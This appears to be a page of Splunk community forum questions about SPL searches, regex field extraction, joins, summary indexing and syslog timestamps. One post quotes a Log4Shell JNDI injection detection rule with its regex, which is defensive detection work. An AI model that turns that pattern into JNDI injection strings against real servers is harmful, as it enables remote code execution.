All Topics

Find Answers
Ask questions. Get answers. Find technical product solutions from passionate members of the Splunk community.

All Topics

I have below raw string  03 Mar 2022 10:08:18,188 GMT ERROR [dbdiNotificationService,ServiceManagement] {} - Caught Runtime exception at service dbdiNotificationService java.lang.IllegalArgumen... See more...
I have below raw string  03 Mar 2022 10:08:18,188 GMT ERROR [dbdiNotificationService,ServiceManagement] {} - Caught Runtime exception at service dbdiNotificationService java.lang.IllegalArgumentException: No enum constant com.db.fx4capi.Fx4cApiLocal.TradeProcessingStatus.TRADE_STATUS_CANCELLED at java.lang.Enum.valueOf(Enum.java:238) ~[?:1.8.0_311] at com.db.fx4capi.Fx4cApiLocal$TradeProcessingStatus.valueOf(Fx4cApiLocal.java:10) ~[trade-22.1.1-8.jar:?] at com.db.fx4cash.trade.step.GetTradeReferenceAndStatusStep.step(GetTradeReferenceAndStatusStep.java:24) ~[step-22.1.1-8.jar:?] at com.db.servicemanagement.TransactionDispatchService.executeIteration(TransactionDispatchService.java:275) [servicemanagement-22.1.1-8.jar:?] at com.db.servicemanagement.TransactionDispatchService.startDispatch(TransactionDispatchService.java:673) [servicemanagement-22.1.1-8.jar:?] at com.db.servicemanagement.TransactionDispatchService.run(TransactionDispatchService.java:91) [servicemanagement-22.1.1-8.jar:?] at com.db.servicemanagement.ServiceThread.run(ServiceThread.java:36) [servicemanagement-22.1.1-8.jar:?] at java.lang.Thread.run(Thread.java:748) [?:1.8.0_311]     -------------------------------------------------------------------------------------------------------------------------------------- I would like to capture marked in bold. am using below command but getting partial output. index=app_events_fx4cash_uk_prod source=*STPManager-servicemanagement.20220303-100818.log* | rex field=_raw "^[^\-\n]*\-\s+(?P<Error>.+)" | table Error my output  Caught Runtime exception at service dbdiNotificationService   but my requirement is i need to capture whole error marked in bold
Hi all, I am ingesting Cisco FTD logs and currently using the Cisco ASA add-on which works fine for a lot of event messages. Unfortunately it is not working perfect as there is one event message th... See more...
Hi all, I am ingesting Cisco FTD logs and currently using the Cisco ASA add-on which works fine for a lot of event messages. Unfortunately it is not working perfect as there is one event message that is not getting recognized by the add-on. What Splunk supported method is the best for a standardized onboarding with full CIM knowledge? I do not want to use the estreamer as it is mostly creating issues and is not Splunk supported. Currently used: "Splunk_TA_cisco-asa-4.2.0"   Best  O.
  Can some one help me with Regex to get SecurityID value (in Bold) in Target Account.  Below is sample. **Event in Text form*** 03/23/2022 03:20:16 PM LogName=Security SourceName=Microsoft W... See more...
  Can some one help me with Regex to get SecurityID value (in Bold) in Target Account.  Below is sample. **Event in Text form*** 03/23/2022 03:20:16 PM LogName=Security SourceName=Microsoft Windows security auditing. EventCode=4738 EventType=0 Type=Information ComputerName=FRDPLIDC1.emea.loreal.intra TaskCategory=User Account Management OpCode=Info RecordNumber=386009504 Keywords=Audit Success Message=A user account was changed. Subject: Security ID: EMEA\romain.pruneaux-adm Account Name: romain.pruneaux-adm Account Domain: EMEA Logon ID: 0x31BBDCF0 Target Account: Security ID: EMEA\frclichyloftvcL05.01 Account Name: frclichyloftvcL05.01 Account Domain: EMEA
Hi, I am using the below query to bring the output in graph dashboard but this query gives Disk memory values is same . I have attached the output also. Can anyone help me  Query: index=oswin s... See more...
Hi, I am using the below query to bring the output in graph dashboard but this query gives Disk memory values is same . I have attached the output also. Can anyone help me  Query: index=oswin sourcetype="Perfmon:Processor" host=COPYCAR01 | timechart avg(cpu_load_percent) as CPU span=15min | join type=left host [| mstats avg("Memory.%_Committed_Bytes_In_Use") as Memory WHERE index=oswinperf AND host=COPYCAR01 span=15min ] | join type=left host [| mstats avg("LogicalDisk.%_Free_Space") as Diskfree WHERE index=oswinperf AND host=COPYCAR01 span=15min | eval DISK=100 - Diskfree | table _time,DISK]   Output: _time CPU DISK Memory 2022-03-24 09:00:00 55.78524325650826 57.29944034187627 11.84846114177454 2022-03-24 09:15:00 59.38775699798989 57.29944034187627 11.84846114177454 2022-03-24 09:30:00 56.71582822628451 57.29944034187627 11.84846114177454  
I am seraching as below but my join operation is not bringing results from the join for only couple of imei/records. I have 100 different imei number but only 10 of them are not returning any results... See more...
I am seraching as below but my join operation is not bringing results from the join for only couple of imei/records. I have 100 different imei number but only 10 of them are not returning any results.      index="etl_pipeline_data" environment=prd source=meta_data origin IN (device_properties, gsm_info,backend_transaction) |fields _time,tenant,origin,imei,timestamp, timestamp_device,tz_offset_cest |eval ts_device_epoch=strptime(timestamp_device,"%Y-%m-%dT%H:%M:%S.%3N")| eval ts_device=ts_device_epoch+tz_offset_cest |eval eventdate=strftime(ts_device,"%Y-%m-%d") |stats latest by tenant,origin,imei,ts_device |rename latest(*) as * |stats values(*) by tenant, imei, eventdate |join type=left imei [|loadjob savedsearch="xx:yyy:DEVICE_TRAINPASS_Report_db" ] | where imei = 352369082111082 | table imei, eventdate,train2s     As a proof of record in second serach I have tried to check the data type, there is no issues with that.  I also tried below method instead of join but it's not returning any records as well.      index="etl_pipeline_data" environment=prd source=meta_data origin IN (device_properties, gsm_info,backend_transaction) |fields _time,tenant,origin,imei,timestamp, timestamp_device,tz_offset_cest |eval ts_device_epoch=strptime(timestamp_device,"%Y-%m-%dT%H:%M:%S.%3N")| eval ts_device=ts_device_epoch+tz_offset_cest |eval eventdate=strftime(ts_device,"%Y-%m-%d") |stats latest by tenant,origin,imei,ts_device |rename latest(*) as * |stats values(*) by tenant, imei, eventdate |table imei,eventdate |append [|loadjob savedsearch="xx:yyyy:DEVICE_TRAINPASS_Report_db" | fields imei,eventdate,trains ] | where imei = 352369082111082     is there any limitation in Splunk ? Could you please help me to achive this merge operation ? 
Hi Splunkers, in my tasks I performed an exam of some already Splunk searches and one of these is about a Log4j vulnerability; in particular, I encountered the rules ESCU - Log4Shell JNDI Payload ... See more...
Hi Splunkers, in my tasks I performed an exam of some already Splunk searches and one of these is about a Log4j vulnerability; in particular, I encountered the rules ESCU - Log4Shell JNDI Payload Injection Attempt - Rule that has the following code: | from datamodel Web.Web | regex _raw="[jJnNdDiI]{4}(\:|\%3A|\/|\%2F)\w+(\:\/\/|\%3A\%2F\%2F)(\$\{.*?\}(\.)?)?" | fillnull | stats count by action, category, dest, dest_port, http_content_type, http_method, http_referrer, http_user_agent, site, src, url, url_domain, user | `log4shell_jndi_payload_injection_attempt_filter` I noted the use of _raw field and that, even if a datamodel is used, tstats command is avoided and insted of it a normal stats is in the code. So I tried to translate it in a search which use tstats, something like that: | tstats summariesonly=true fillnull_value="N/D" count from datamodel=Web by Web.log_region, Web.log_country, index, host, Web.src, Web.dest _raw | `drop_dm_object_name("Web")` | regex _raw="[jJnNdDiI]{4}(\:|\%3A|\/|\%2F)\w+(\:\/\/|\%3A\%2F\%2F)(\$\{.*?\}(\.)?)?" and I got no result; following, I removed the regex filter and noted that, when the search is performed, the _raw filed is filled with "N/D" value. Does this mean that _raw cannot be used with tstats?
I would like generate alert if no event for mentioned destination List for last 30 min. I have tried below but is not work. Index=_firewall sourcetype="f5:bigip:asm:syslog" dest_ip="10.10.10.20" ea... See more...
I would like generate alert if no event for mentioned destination List for last 30 min. I have tried below but is not work. Index=_firewall sourcetype="f5:bigip:asm:syslog" dest_ip="10.10.10.20" earliest= -30m latest=now | stats count by dest_ip,Service | eval count=if (count <=20,0,0)  
Hello,  I have a scheduled report, which is used to fill a summary index.  The report for the summary index is scheduled hourly (based on indextime) The event data is usually indexed on daily bas... See more...
Hello,  I have a scheduled report, which is used to fill a summary index.  The report for the summary index is scheduled hourly (based on indextime) The event data is usually indexed on daily basis at once (sometimes though there are multiple data ingestions of the server per day) Now the thing is, that the search is inefficient. In normal cases, this is no issue, but when a day was skipped for ingestion and the next day therefore indexes two days of event data at once, the report for the summary index will crash and there will be a gap in the summary index. To avoid data gaps, I configured the search to be durable This is the configuration regarding the time constraints of the search: This is the configuration for the durable search (Backfill method is multiple, as it is recommended for searches with transforming commands) To test, if data gaps of the summary index are recovered automatically, I stopped the dataflow of for the event index for 5 days and then indexed all the data at once, knowing, that this will lead the scheduled report to crash. Unfortunately, the durable search did not recover the data gap of the summary index. From the 5 days only a few hours were indexed into the summary index. Does someone have an idea why this is so? Thanks and best regards  
i have system column "_time" with below output  2022-03-16 11:12:18.723 i would like segregate date and time by rex command  output should be like this with new column name  Date = 2022-0... See more...
i have system column "_time" with below output  2022-03-16 11:12:18.723 i would like segregate date and time by rex command  output should be like this with new column name  Date = 2022-03-16 Time = 11:12:18
Hello I use a complex search with display results ordered by time in a table  As you can see the time period is today between 7h and 19h     | appendcols [ search `index` type=* earlie... See more...
Hello I use a complex search with display results ordered by time in a table  As you can see the time period is today between 7h and 19h     | appendcols [ search `index` type=* earliest=@d+7h latest=@d+19h | search web_domain=sharepoint.com | search web_duration_ms > 7000 | stats count as PbPerf by sam _time | timechart span=1h dc(sam) as "SHAREPOINT - Nb d'utilisateurs ayant un temps de réponse > 7 sec" ] | appendcols [ search `index` type=* earliest=@d+7h latest=@d+19h | search web_domain=laposte.sharepoint.com | timechart span=1h count as "SHAREPOINT - Nb d'erreurs" ] | where _time <now() | eval time=strftime(_time,"%H:%M") | sort time | fields - _time _span _origtime | transpose 0 header_field=time column_name=KPI | fillnull value=0 | sort + KPI       The results are displayed like this In the KPI field, I have 10 differents items The problem I have is when I run the dashboard at 7h, I have just one or 2 items displayed without results in the span = 7h all the more that the column corresponding to 7h is not displayed! Items start to be displayed when there is a result > 0 and in this case the column "7h" is well displayed What I need is when I launch the dashboard at 7h and even if the time is less than 8h, I have all the items for the KPI column displayed and the column "7h" too with results=0 if there is no results or of course with results if there is results could you help me on this complex need please?  
Hi, I would like to get the average of multiple fields in the same row but not all, would anyone be able to advise on this? query | chart latest(time_taken) by process server # Results ... See more...
Hi, I would like to get the average of multiple fields in the same row but not all, would anyone be able to advise on this? query | chart latest(time_taken) by process server # Results Process Local-1 Local-2 Avg(Local) Remote-1 Remote-2 A 1 2 1.5 2 2 B 1 3 2 3 3 I would like to add an Avg(Local) field which gives me the average time taken by the processes running on Local-1 and Local-2. Appreciate any suggestions, thanks!  
I have list of items plotted in line graph which is basically time-series data. I would like to have an option to select one or multiple items alone from that list and see the graph   Like in below... See more...
I have list of items plotted in line graph which is basically time-series data. I would like to have an option to select one or multiple items alone from that list and see the graph   Like in below graph has two items listed in time series graph. How I can view only one item or multiple item when there are more items ?  Can i add a search for the list of items on the right along with the list ?    
How to display authentication error in python for Splunk connection?
How to display Oneshot ResponseReader Object.
Hi All, I was trying to generate the results from my search more than 10,000 results. It displayed a message like results are being truncated. Is there any way to change the limit for my column chart... See more...
Hi All, I was trying to generate the results from my search more than 10,000 results. It displayed a message like results are being truncated. Is there any way to change the limit for my column chart in the XML file. Here, I don't have permission to change visualization.conf file. So asking anyway to change through in XML source?
Hi all, Need help for the below qery I have st of application logs and all are in text format which are genratng every day. So i need to send all those logs to the splunk with proper field extr... See more...
Hi all, Need help for the below qery I have st of application logs and all are in text format which are genratng every day. So i need to send all those logs to the splunk with proper field extraction. Please assist.        
Hi, I am trying to use case keyword to solve a multiple nested statement  but it is just giving me output for the else value, it seems like it is not going inside any other statement to check, Coul... See more...
Hi, I am trying to use case keyword to solve a multiple nested statement  but it is just giving me output for the else value, it seems like it is not going inside any other statement to check, Could anyone please help me here. I tired using multiple if statement with eval still I was having the same issue. Problem statement : I want to compare the value of status-fail and status-success and on the basis of that we need to generate the output case1 : if value of status-fail =0 and status-success>0 ---> successful logins case2: if value of status-fail >0 and status-success>0 --->  multi-successful logins case3: if value of status-fail >0 and status-success=0 ---> multi-fail case4: if value of status-fail >0  ---> fail logins Below is the query what I am using : table hqid, httpStatus | eval status-success=if(httpStatus="200",1,0) | eval status-fail= if(httpStatus != "200",1,0) | stats sum(status-success) as status-success, sum(status-fail) as status-fail by hqid | eval status = case(status-fail = 0 AND status-success > 0, "successful-logins", status-fail > 0 AND status-success > 0, "multi-success", status-fail > 0 AND status-success=0, "multi-fail", status-fail > 0, "fail",1=1,"Others")
Gentlemen, We are ingesting Windows SYSmon logs via TA-microsoft-sysmon , and the raw events are showing in XML format.   There are couple of fields that did not get extracted and even with IFX, the... See more...
Gentlemen, We are ingesting Windows SYSmon logs via TA-microsoft-sysmon , and the raw events are showing in XML format.   There are couple of fields that did not get extracted and even with IFX, the accuracy of extracting these 2 fields isn't working 100%.   Below is one of the XML tags / elements from my raw event.  Can someone pls assist me with regex for extracting  techqniue_id and technique_name ??   As you can see, these 2 are embedded within the "RuleName" tag.       <Data Name='RuleName'>technique_id=T1055.001,technique_name=Dynamic-link Library</Data>       I have tried on regex101.com but can't get my capture group to extract these 2 values.  At the end of the day, i want 2 fields  techqniue_id ( with a value=T1055.001)   and technique_name ( value = Dynamic-link Library) to show up under "Interesting fields" . Thank you in advance
From the below Log: aoauwersdfx01a-mgt.example.com NewDecom: Info: 164807335647.901 0 10.200.111.06 NONE/504 0 GET http://wpad.example.com/wpad.dat - NONE/wpad.example.com Need to extract the fiel... See more...
From the below Log: aoauwersdfx01a-mgt.example.com NewDecom: Info: 164807335647.901 0 10.200.111.06 NONE/504 0 GET http://wpad.example.com/wpad.dat - NONE/wpad.example.com Need to extract the fields: Field 1: result=NON/504 change to status=504 Field 2: url=http://wpad.example.com/wpad.dat change to url=wpad.example.com Need the regular expression for this.  
I have a device that is reporting to the splunk through syslog, that device first goes through an F5 and the F5 gives me the traffic to my heavy forwarders. The problem is that the year of the time s... See more...
I have a device that is reporting to the splunk through syslog, that device first goes through an F5 and the F5 gives me the traffic to my heavy forwarders. The problem is that the year of the time stamp is out of date, the date when a server event is generated is 2022 and in the search head, I see it as 2017. I don't know if the problem is from the origin server at the syslog protocol level or in the transport layer or at the collection level within the splunk. This issue only occurs on 3 computers out of 10. I have reviewed the prop settings, but if I don't see the year in the source data, I will hardly be able to modify the timestamp. Regards